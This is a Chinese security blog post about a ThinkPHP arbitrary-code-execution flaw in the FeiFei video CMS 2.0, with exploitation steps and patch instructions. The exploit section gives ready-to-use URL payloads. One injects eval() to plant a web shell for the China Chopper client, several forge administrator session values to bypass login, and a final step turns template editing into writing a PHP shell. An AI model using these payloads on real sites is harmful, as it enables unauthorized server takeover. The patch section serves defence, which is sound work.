您的位置 » 首页 » 实用工具 » 飞飞影视系统2.0.120220(Beta4)版thinkphp任意代码执行漏洞利用及修复

飞飞影视系统2.0.120220(Beta4)版thinkphp任意代码执行漏洞利用及修复

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年09月17日 | 文章热度:14,276 次 全屏阅读

显示不全请点击全屏阅读

第一个方法 直接执行
http://www.2cto.com/index.php?s=vod-search-area-${@print(eval($_POST[c]))} .html
直接拿菜刀连接。

第二种方法:(这个好麻烦)可以执行构造SESSION,然后直接登录后台,依次执行下边三条。
在地址栏直接输入
index.php?s=vod-search-area-${@$_SESSION[AdminLogin]=1}.html

index.php?s=vod-search-area-${@$_SESSION[C(USER_AUTH_KEY)]=1}.html

index.php?s=vod-search-area-${@$_SESSION[admin_ok]=chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49)}.html

执行完毕登录后台。
直接地址栏输入
index.php?s=admin-index
index.php?s=Admin-Index-Top

index.php?s=Admin-Index-Top

s=Admin-Tpl-Show
/index.php?s=Admin-Cache-Show
/index.php?s=Admin-Tpl-Show-id-.|Tpl|default


拿shell,模版管理,随便点击一个模版,然后点编辑,然后输入路径,把名字改成xx.php写上一句话。

修复方案:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。

影响到的版本包括2.1、2.2和3.0 请对应相关版本及时更新核心程序。
下载地址:http://thinkphp.cn/download-116.html

修正方法:

首先解压缩安全补丁文件。
2.1和2.2版本
替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Think/Util/目录下的同名文件

3.0版本
替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Core/目录下面的同名文件
替换补丁包中的CheckRouteBehavior.class.php 文件到 ThinkPHP/Lib/Behavior/目录下面的同名文件

Tags:

thinkphp任意代码执行漏洞, 飞飞影视系统2.0漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/911/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)